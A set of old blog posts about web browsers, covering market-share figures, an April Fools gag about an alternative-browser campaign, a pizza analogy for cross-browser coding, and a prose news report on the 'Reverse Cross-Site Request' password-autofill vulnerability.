Tag: IE

Posted on
by

Opera Mini - The free Web browser for nearly any phoneTwo web browsers hit milestones on Net Applications’ stats for September: Safari has passed the 5% mark, hitting 5.07%, and Opera Mini has climbed onto the chart at 0.39%. That might not sound like much, but considering that nearly all web traffic is from desktop computers these days, for a mobile phone–only browser to reach that size is impressive.

A bit closer to home, this site is currently seeing 64.6% IE, 26.2% Firefox, 4.4% Safari, 1.2% Opera (which probably includes both the desktop and mini versions). Splitting IE into versions, we’ve got 35.9% IE6 and 28% IE7. We’re already at the point where IE6 users are a minority (albeit the largest one), and more than 50% of visitors are using something more modern.

I’m looking forward to the next 2 milestones: IE7 overtaking IE6, and Firefox overtaking IE6. Come to think of it, I’d really like to get rid of IE6. Its time has passed, and the web will be better off without it, just as it’s better off without Netscape 4.

Posted on
by

Alternative Browser Alliance - New LogoI’ve been thinking about this for a while, but it’s time to refocus the Alternative Browser Alliance. Mozilla’s Asa Dotzler has referred to Firefox and Internet Explorer as the “mainstream browsers” for more than a year now, and it looks like that’s become true.

The web is no longer an IE monopoly. It’s become an IE/Firefox oligopoly. Firefox is no longer an alternative web browser. It’s sold out, its ads are everywhere, and it even allows people to build Firefox-only code.

So, starting today (April 1, 2007), the Alternative Browser Alliance will no longer promote Firefox.

So what will replace it? I thought about Opera, but most of its install base is on cell phones and PDAs, and we all know the mobile web browser is dead, right? Safari? Well, it turns out that WebKit is shutting down.

So the site will be putting its weight behind iCab. It’s as alternative as they come, and it’s guaranteed to remain that way (since it won’t run on Vista).

Update: Yes, it’s an April Fools joke.

Posted on
by

When web designers switch from focusing on a single browser (usually Internet Explorer) to developing cross-browser sites (usually adding Firefox, sometimes Opera or Safari, ideally all three), they often find that things don’t work as expected in the “new” browser. This can be for a number of reasons, including:

  • Bugs or “missing” features in the new browser (whether incomplete support in the new browser, or proprietary features in the familiar browser).
  • Broken code on the website being handled differently.
  • Different defaults where behavior isn’t well-defined in the specifications.

A big problem is that when you get into the code, a lot of pages aren’t as specific as the authors think they are. When you write code and test it on one browser, you’re not testing that the code is correct, you’re testing that that browser makes the same assumptions you do.

It’s like ordering pizza.

No, really. Let’s say Internet Explorer specializes in Chicago-style pizza, with a thick, chewy crust. And let’s say Firefox specializes in New York-style pizza, with a thin crust. But each can make the other style of pizza on request.

So you call up Internet Explorer and ask for pizza. They deliver you Chicago pizza, and if that’s what you wanted, you figure your order is fine. If you actually wanted New York style, you make sure that next time, you tell them you want that style of pizza.

But let’s say you like Chicago pizza. You get used to calling up IE and just asking for “pizza,” until one day you’re busy, and ask your roommate to order it. He likes to get his pizza from Firefox, so he calls them up, asks for “pizza,” and you get New York style. That’s not what you wanted. Obviously, Firefox pizza is inferior, because they got the order wrong! Well, no, it’s not, and no, they didn’t. They delivered what they were asked for. If you’d told your roommate to ask for Chicago style, Firefox would have been perfectly happy to deliver that style of pizza.

The moral of the story: always be specific with your code. Make sure it’s asking for what you think it’s asking for (validation helps here). And if something doesn’t do what you expect, make sure you didn’t leave that expectation out of your order.

See also: No, Internet Explorer did not handle it properly

(Expanded from a comment I posted at Mozillazine.)

Posted on
by

ISC is reporting a new type of vulnerability in web browsers that the discoverer has termed as “Reverse Cross-Site Request,” or RCSR.

Basically, on a site with user-generated content—like a hosted blog—it’s possible to add a form that looks like the site’s login form. If the victim has an account on the same site, and has asked their browser to save their password, it will auto-fill the form. If the attacker can somehow trick the visitor into submitting the form—say, with an invisible image submit button (ever clicked randomly? Or to get back to the page after looking at another window?)—the attacker gets the visitor’s password.

What’s new about this is that all it requires is plain HTML, not scripting, which most blog hosts and similar sites already block.

Chapin Information Services discovered the bug in Firefox 2, and reported it to Mozilla. It turns out that Internet Explorer 6 and 7 are also vulnerable, but only if it’s on the same page as the real login form. Mozilla is currently trying to determine the best way of resolving the problem without breaking all the passwords people have already saved. The ISC article links to the bug report, so you can follow the discussion. Microsoft has only said that they’re “aware of the issue.”

At the moment, I’m glad I don’t let web browsers save my passwords.